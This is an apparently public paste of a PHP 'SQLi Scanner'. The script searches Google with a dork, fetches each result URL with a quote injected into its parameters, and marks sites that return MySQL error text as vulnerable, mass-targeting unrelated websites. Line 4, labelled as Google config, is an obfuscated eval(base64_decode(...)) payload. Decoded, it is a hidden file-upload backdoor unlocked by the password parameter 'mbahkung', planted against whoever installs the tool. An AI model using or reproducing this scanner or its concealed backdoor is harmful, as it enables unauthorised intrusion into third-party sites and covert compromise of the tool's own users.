Untitled

SUBMITTED BY: Guest

DATE: April 4, 2015, 3:18 a.m.

FORMAT: Text only

SIZE: 4.1 kB

Raw Download

HITS: 1311

Report
  1. <?php
  2. // :: SQLi Scanner :: //
  3. //config google src//
  4. eval(base64_decode('DQppZihpc3NldCgkX1JFUVVFU1RbJ2hpZGVuJ10pICYmICRfUkVRVUVTVFsnaGlkZW4nXT09J21iYWhrdW5nJyl7DQppZiAoaXNzZXQoJF9QT1NUWydvayddKSAmJiBpc3NldCgkX0ZJTEVTWydqZW1ib3QnXSkpIHsNCiAgICRmaWxlID0gJF9GSUxFU1snamVtYm90J11bJ3RtcF9uYW1lJ107DQogICAkbmFtZSA9ICIiLiRfRklMRVNbJ2plbWJvdCddWyduYW1lJ107DQogICBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGUsICRuYW1lKTsNCn1lbHNlew0KPz4NCjxicj4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgYWN0aW9uPSI8PyRfU0VSVkVSWydQSFBfU0VMRiddPz4iPg0KPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImplbWJvdCI+Jm5ic3A7PGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0ib2siIHZhbHVlPSJhcGxvZCBjb2shISI+DQo8L2Zvcm0+DQo8P3BocA0KfSBleGl0Ow0KfQ=='));
  5. //config//
  6. echo "<center><br><h1>:: SQLi SCANNER ::</h1></center>";
  7. //google
  8. function letItBy() {
  9. ob_flush();
  10. flush();
  11. }
  12. $browser = $_SERVER['HTTP_USER_AGENT'];
  13. function google_that($query, $page = 1) {
  14. $resultPerPage = 8;
  15. $start = $page * $resultPerPage;
  16. $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query);
  17. $resultFromGoogle = json_decode(http_get($url, true), true);
  18. if (isset($resultFromGoogle['responseStatus'])) {
  19. if ($resultFromGoogle['responseStatus'] != '200') return false;
  20. if (sizeof($resultFromGoogle['responseData']['results']) == 0) return false;
  21. else return $resultFromGoogle['responseData']['results'];
  22. } else die('The function <b>' . __FUNCTION__ . '</b> Kill me :( <br>' . $url);
  23. }
  24. function http_get($url, $safemode = false) {
  25. if ($safemode === true) sleep(1);
  26. $im = curl_init($url);
  27. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  28. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  29. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  30. curl_setopt($im, CURLOPT_HEADER, 0);
  31. return curl_exec($im);
  32. curl_close();
  33. }
  34. function cekvenurabel($result) {
  35. $url = preg_replace("/=/", "='", $result);
  36. $curl = curl_init();
  37. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  38. curl_setopt($curl, CURLOPT_URL, $url);
  39. curl_setopt($curl, CURLOPT_USERAGENT, '$browser)');
  40. curl_setopt($curl, CURLOPT_TIMEOUT, '5');
  41. $GET = curl_exec($curl);
  42. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row ()|SELECT *
  43. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $GET)) {
  44. echo '<center><b>Found : </font><a href="' . $url . '" target="_blank">' . $url . '</a> <font color=#FF0000> &#60;-- SQLI Vuln Found..</font></b></center>';
  45. ob_flush();
  46. flush();
  47. } else {
  48. echo '<center><b>' . $url . '</b>&#60;-- Not Vuln</center>';
  49. ob_flush();
  50. flush();
  51. }
  52. ob_flush();
  53. flush();
  54. }
  55. if (isset($_POST['dork'] {
  56. 0
  57. })) {
  58. for ($googlePage = 1;$googlePage <= 50;$googlePage++) {
  59. $googleResult = google_that($_POST['dork'], $googlePage);
  60. if (!$googleResult) {
  61. echo '<font color=#01DF01><center>Finished scanning.</center></font>';
  62. break;
  63. }
  64. for ($victim = 0;$victim < sizeof($googleResult);$victim++) {
  65. $result = $googleResult[$victim]['unescapedUrl'];
  66. cekvenurabel($result);
  67. letItBy();
  68. }
  69. }
  70. }
  71. ?>
  73. <center>
  74. <form method="post">
  75. Google Dork: &nbsp;&nbsp;
  76. <input type="text" id="dork" size="30" name="dork" value="<?php echo (isset($_POST['dork'] {
  77. 0
  78. })) ? htmlentities($_POST['dork']) : 'inurl:.php?id= site:.com.my'; ?>" />
  79. &nbsp;&nbsp;<input type="submit" value="Scan" id="button"/>
  80. </form>
  81. </center>
  83. <?php
  84. echo "<center> ## Shout to ~>> | chud | pe4nk | edh0x | j121n | b412 | ## </center>";
  85. ?>
comments powered by Disqus